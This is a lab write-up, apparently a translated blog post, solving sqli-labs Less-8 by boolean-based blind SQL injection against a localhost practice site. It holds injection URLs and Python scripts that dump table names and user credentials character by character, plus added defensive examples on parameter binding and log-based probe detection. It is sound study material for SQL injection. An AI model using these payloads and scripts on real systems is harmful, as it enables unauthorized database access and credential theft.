Recording my sqli-labs learning process from scratch: sqli-labs Less-8


sqli-Labs Less-8

Once again I slacked off for several days without doing any exercises; I remembered today and am hurrying to catch up (I had meant to keep a pace of one level every day or two and quickly finish the first 23, but kept putting it off).

As usual, start by testing the closing type:
http://localhost/sqli-labs/Less-8/index.php?id=1
http://localhost/sqli-labs/Less-8/index.php?id=1'
http://localhost/sqli-labs/Less-8/index.php?id=1' and 1=2 --+

Single-quote closure, boolean-based blind injection: there are only two outcomes, "You are in…" or no output at all. Boolean blind it is, so let's start probing.

Having practiced this many levels we already know the database name and fields, so I give all the statements directly. The idea is to keep changing the condition and watch whether the page responds, until the correct name has been guessed. When practicing, type the statements by hand to get a feel for it; for real work use a scripted tool, because enumerating by hand is far too much work.

Determine the version:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(version(),3)=5.7 --+

Determine the database name length:
http://localhost/sqli-labs/Less-8/index.php?id=1' and length(database())=8 --+

Database name:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left(database(),8)='security' --+

Number of tables in the database:
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4 --+

Table names:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 0,1),6)='emails' --+   (emails table)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),8)='referers' --+ (referers table)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 2,1),7)='uagents' --+  (uagents table)
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users' --+    (users table)

Number of columns in the users table:
http://localhost/sqli-labs/Less-8/index.php?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=3 --+

Columns of the users table:
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),2)='id' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),8)='username' --+
http://localhost/sqli-labs/Less-8/index.php?id=1' and left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),8)='password' --+
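Why the two outcomes described above are enough to leak data, and what removes the leak: an added example that is not from the original post, using an in-memory SQLite table as a constructed stand-in for the lab's users table (the table contents, the function names and the use of length() instead of the lab's left() are my assumptions).

```python
import sqlite3

# Constructed stand-in for the lab's users table (not the lab's real data), in SQLite
# so it runs without a MySQL server.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'alice', 'secret1')")
    return con

def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> str:
    # Less-8 style: the parameter is spliced into a single-quoted literal, so a stray
    # quote lets client-supplied SQL run. The page only reveals hit or miss, which is
    # all a boolean-blind probe needs.
    sql = "SELECT id FROM users WHERE id='%s' LIMIT 1" % user_id
    return "You are in..........." if con.execute(sql).fetchone() else ""

def lookup_safe(con: sqlite3.Connection, user_id: str) -> str:
    # Parameter binding: the whole input is a bound value, never SQL text, so a
    # condition appended by the client cannot change what the query tests.
    sql = "SELECT id FROM users WHERE id=? LIMIT 1"
    return "You are in..........." if con.execute(sql, (user_id,)).fetchone() else ""

def oracle_exists(lookup) -> bool:
    """True if a true and a false injected condition produce different output,
    i.e. the endpoint can be used as a boolean oracle (SQLite has no left(), so
    length() stands in for the lab's left() probe)."""
    con = make_db()
    true_cond = "1' and length(username)=5 -- "
    false_cond = "1' and length(username)=6 -- "
    return lookup(con, true_cond) != lookup(con, false_cond)
```

With the bound parameter both probes return nothing, so there is no longer a true/false signal to enumerate against.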

When it came to enumerating the usernames and passwords I found I couldn't keep listing them like this; I'd have to write a script to run the queries in bulk, so I looked into how to write a Python script. Since I'm learning Python as I go, my skill is limited and I borrowed from many articles by more experienced people. The code for each part is given below.

Test the database name length:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   # change the url to match your own sqli-labs path
payload = "and%20length(database())={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode()       # encode to bytes, otherwise comparing against u.content raises an error
for i in range(1, 20):
    p = payload.format(a=i)
    u = requests.get(url + p)
    if str2 in u.content:  # the page only says "You are in..." when the condition is true
        print('对比成功长度为', i)
        break

Get the database name:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   # change the url to match your own sqli-labs path
payload = "and%20left(database(),{Name_order})=%27{Name}%27%20--%20"
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@', '#', '$', '%', '^', '&', '*', '(', ')', '-', '_', '=', '+', '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode()   # encode to bytes, otherwise comparing against u.content raises an error
database_name = ''
for i in range(1, 10):             # i is how many leading characters are compared
    for ch in list1:               # 'ch' rather than 'str', so the builtin is not shadowed
        p = payload.format(Name_order=i, Name=database_name + ch)
        u = requests.get(url + p)
        if str2 in u.content:
            database_name = database_name + ch
            print('匹配第', i, '位成功')
            break
    else:
        break                      # no character matched at this position: the name is complete
print('database name is', database_name)

Get the number of tables:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   # change the url to match your own sqli-labs path
payload = "and%20(select%20count(table_name) from information_schema.tables where table_schema=database())={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode()       # encode to bytes, otherwise comparing against u.content raises an error
for i in range(1, 10):
    p = payload.format(a=i)
    u = requests.get(url + p)
    if str2 in u.content:
        print('对比成功长度为', i)
        break

Get the table names:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   # change the url to match your own sqli-labs path
payload = "and%20left((select table_name from information_schema.tables where table_schema=database() limit {Name_order},1),{Name_num})=%27{Name}%27%20--%20"
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@',  '$',  '^',  '*', '(', ')', '-', '_', '=',  '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode()   # encode to bytes, otherwise comparing against u.content raises an error
table_names = ['', '', '', '']     # one entry per table, as found by the count script above
for i in range(0, 4):              # i is the LIMIT offset, i.e. which table
    for j in range(1, 20):         # j is how many leading characters are compared
        for ch in list1:
            p = payload.format(Name_order=i, Name_num=j, Name=table_names[i] + ch)
            u = requests.get(url + p)
            if str2 in u.content:
                table_names[i] += ch
                print('匹配第', i + 1, '张表第', j, '位成功')
                break
        else:
            break                  # no match at position j: this table name is complete
for k, name in enumerate(table_names, 1):
    print(f'字段{k}为', name)

Get the number of columns in the users table:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   # change the url to match your own sqli-labs path
payload = "and%20(select%20count(column_name) from information_schema.columns where table_schema=database() and table_name='users')={a}%20--%20"
str1 = "You are in..........."
str2 = str1.encode()       # encode to bytes, otherwise comparing against u.content raises an error
for i in range(1, 10):
    p = payload.format(a=i)
    u = requests.get(url + p)
    if str2 in u.content:
        print('对比成功长度为', i)
        break

Get the column names of the users table:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   # change the url to match your own sqli-labs path
payload = "and%20left((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit {Name_order},1),{Name_num})=%27{Name}%27%20--%20"
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '@',  '$',  '^',  '*', '(', ')', '-', '_', '=',  '.', '?', '|', '/']
str1 = "You are in..........."
str2 = str1.encode()   # encode to bytes, otherwise comparing against u.content raises an error
column_names = ['', '', '']        # one entry per column, as found by the count script above
for i in range(0, 3):              # i is the LIMIT offset, i.e. which column
    for j in range(1, 20):         # j is how many leading characters are compared
        for ch in list1:
            p = payload.format(Name_order=i, Name_num=j, Name=column_names[i] + ch)
            u = requests.get(url + p)
            if str2 in u.content:
                column_names[i] += ch
                print('匹配第', i + 1, '张表第', j, '位成功')
                break
        else:
            break                  # no match at position j: this column name is complete
for k, name in enumerate(column_names, 1):
    print(f'字段{k}为', name)

For the column counts of the other three tables just try by hand; it is much faster than writing a script, or let the script sweep a wide range, which comes to the same thing.

Finally, dump username and password:

import requests

url = 'http://localhost/sqli-labs/Less-8/index.php?id=1%27'   # change the url to match your own sqli-labs path
payload1 = "and%20left((select username from users where id ={Name_order}),{Name_num})=%27{Name}%27%20--%20"
payload2 = "and%20left((select password from users where id ={Name_order}),{Name_num})=%27{Name}%27%20--%20"
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
         'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
         'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
         'Z', '.']
str1 = "You are in..........."
str2 = str1.encode()   # encode to bytes, otherwise comparing against u.content raises an error
field_name1 = [''] * 13            # usernames, one slot per id
field_name2 = [''] * 13            # passwords, one slot per id


def extract(payload, results):
    # results[i] accumulates the value of the row with id = i, one character per match
    for i in range(0, 13):
        for j in range(1, 20):
            for ch in list1:
                p = payload.format(Name_order=i, Name_num=j, Name=results[i] + ch)
                u = requests.get(url + p)
                if str2 in u.content:
                    results[i] += ch
                    print('匹配第', i, '个字段第', j, '位成功')
                    print(results)
                    break
            else:
                break              # no match at position j: this value is complete


extract(payload1, field_name1)     # username column
extract(payload2, field_name2)     # password column (second payload, not the first one again)
print('字段username', field_name1)
print('字段password', field_name2)
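From the defender's side, an enumeration like the scripts above is loud: one client sends hundreds of requests that differ only by one character inside `and left(...)`. The following added example, not from the original post, scans constructed common-log-format access lines for those probe signatures and counts hits per client IP; the log lines, signature names and threshold are my assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from the original post): one
# ordinary request, then three boolean-blind probes of the kind shown above.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2022:10:00:01 +0000] "GET /sqli-labs/Less-8/index.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [25/Apr/2022:10:00:02 +0000] "GET /sqli-labs/Less-8/index.php?id=1%27%20and%20length(database())=8%20--%20 HTTP/1.1" 200 512
10.0.0.9 - - [25/Apr/2022:10:00:03 +0000] "GET /sqli-labs/Less-8/index.php?id=1%27%20and%20left(database(),1)=%27s%27%20--%20 HTTP/1.1" 200 512
10.0.0.9 - - [25/Apr/2022:10:00:03 +0000] "GET /sqli-labs/Less-8/index.php?id=1%27%20and%20left((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1)=%27e%27%20--%20 HTTP/1.1" 200 512
"""

# client IP and request target from a common-log-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Probe signatures, matched on the URL-decoded, lower-cased query string.
SIGNATURES = {
    "length_probe": re.compile(r"\band\s+length\s*\("),
    "left_probe": re.compile(r"\band\s+left\s*\("),
    "schema_read": re.compile(r"information_schema\."),
    "comment_tail": re.compile(r"--\s*$|#$"),
}

def classify(query: str) -> list:
    """Names of every signature that matches one raw query string."""
    q = unquote_plus(query).lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]

def scan(log_text: str) -> dict:
    """Map each client IP to a Counter of signature hits over its requests."""
    hits = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for sig in classify(target.partition("?")[2]):
            hits.setdefault(ip, Counter())[sig] += 1
    return hits

def suspicious_ips(log_text: str, threshold: int = 2) -> list:
    """IPs whose total probe hits reach the threshold; a real character-by-character
    dump like the scripts above produces hundreds of such requests."""
    return sorted(ip for ip, c in scan(log_text).items() if sum(c.values()) >= threshold)
```

The same signatures applied at a WAF or in the application's own query logging would flag the probing before the dump completes, and the per-IP volume makes rate limiting an effective first response.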



Original URL: http://outofmemory.cn/langs/719261.html
